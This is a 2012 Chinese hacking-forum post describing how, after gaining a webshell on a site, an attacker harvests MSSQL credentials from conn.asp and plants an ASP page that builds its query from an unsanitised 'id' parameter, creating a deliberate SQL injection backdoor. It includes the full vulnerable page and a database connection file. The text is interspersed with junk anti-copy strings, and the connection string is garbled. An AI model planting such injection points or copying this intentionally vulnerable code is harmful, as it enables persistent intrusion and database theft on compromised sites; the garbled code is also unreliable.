中国网络渗透测试联盟

标题: 自己构造注入点方便入侵 [打印本页]

作者: admin    时间: 2012-9-13 17:27
标题: 自己构造注入点方便入侵
自己构造注入点方便入侵2 {. x% B9 K8 g5 `/ d
# A# h+ E. }6 _8 j$ ?$ C0 e
今天看了rootkit论坛里面有人要我写出来关于伪造一个注入点,然后方便渗透,找到更多的可利用的信息( a. i5 V- a+ n* |5 q% N* R
( H& d2 R1 R3 _$ r
这两天一直考试,想了下,就先仍出来,有什么问题可以提出来,我们一起讨论!( z9 ?; o5 g5 [' v* h' d
1 z3 T8 V" a. G4 ^: x$ }! S& S" k
首先你要拿了一个webshell,这样你找到连接数据库的文件,大多都是conn.asp这个文件里面有mssql的用户和! u% K# H% d& ?! U+ G" e

% E7 ~! }8 a* u3 k3 H  I, k9 Q密码,你要找到用户名、密码、数据库所在的IP,然后连接上去,至于连接大家应该都会,找到网站管理员的表
& x% [; @" d  K  r5 A/ L
7 A5 O: j) m% O1 T' k因为我测试的时候是用管理员的表,我朋友说任何表名都可以,只要这个表存在,代码如下:% j* ]2 g& e% N/ `2 z5 V+ E* W

2 c0 u  T- e2 ?程序代码  N0 F* n1 k; O; i, y; G, F# n
<!--#include file="xx.asp"-->, D1 H5 h1 t4 n
<%
) `  t7 D4 B$ @; k9 zset rs=server.createobject("ADODB.recordset"). Y0 a/ J; f. x
id = request("id")
1 J4 ~! j4 u- A, V5 X% y2 dstrSQL = "select * from admin where id=" & id) ^& _# l/ D8 _, y2 _1 f0 A
rs.open strSQL,conn,1,3
2 ]& a- h7 @* r, H: jrs.close7 K% }/ U3 K' O: \
%>4 V- W/ v9 C; x4 I
* H2 v* d0 ]  K8 V
把strSQL = "select * from admin where id=" & id 这句话里面的admin换成要伪造的表名,注意必须存在
, [- O+ S, v( g% z% V
3 j' h: y  o8 h  X6 G你可以连接上去看下表名就是了!这里假设的是admin是表名!这个文件名随便保存!5 Y! \; A4 ?3 e
( G) g$ G/ `" ~( h4 l$ Z
然后就要构造一个连接数据库的文件了,代码如下:& u% ~& x: M* N" k/ p
程序代码. g2 f, o+ B7 _  |2 u
<%        
6 K1 R4 d( ?% Q& RstrSQLServerName = "000.000.000.000"     '服务器名称或地址
5 P. ]/ U4 P( c, t) D8 |strSQLDBUserName = "sqlname"         '数据库帐号- t. B- Y; a+ |7 l6 V$ D& l9 |
strSQLDBPassword = "sqlpass"         '数据库密码+ L9 j. c3 ]; k/ p
strSQLDBName = "sqldataname"           '数据库名称
8 b) N& Z: i# `Set conn = Server.CreateObject("ADODB.Connection")
5 r1 I, {+ S6 ?+ l8 {) R0 ^" BstrCon = "rovider=SQLOLEDB.1ersist Security Info=False;Server=" & strSQLServerName & ";User ID=" & strSQLDBUserName & "assword=" & strSQLDBPassword & ";Database=" & strSQLDBName & ";"! R% A3 S5 J1 f- s9 V/ X
conn.open strCon
# C! o) f& A0 `& _4 k# U, d" n' z6 [%>
) I$ o" L4 g7 D3 b0 b9 S" K0 O
2 {# t5 M1 T/ \" c  x这里应该都会了,就不罗嗦了,不过注意的是保存的文件名要和include调用的名字一样。。还是罗嗦话,/ M  y+ K% h/ [6 W

, A5 M9 w- `) A4 q; T就这样,正常情况下,就OK了,伪造成功……
) T( N5 k4 T1 _& a% k: H6 X! r, Q/ }- i/ p7 n1 x
           如果有什么问题可以提出来大家一起探讨解决。




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2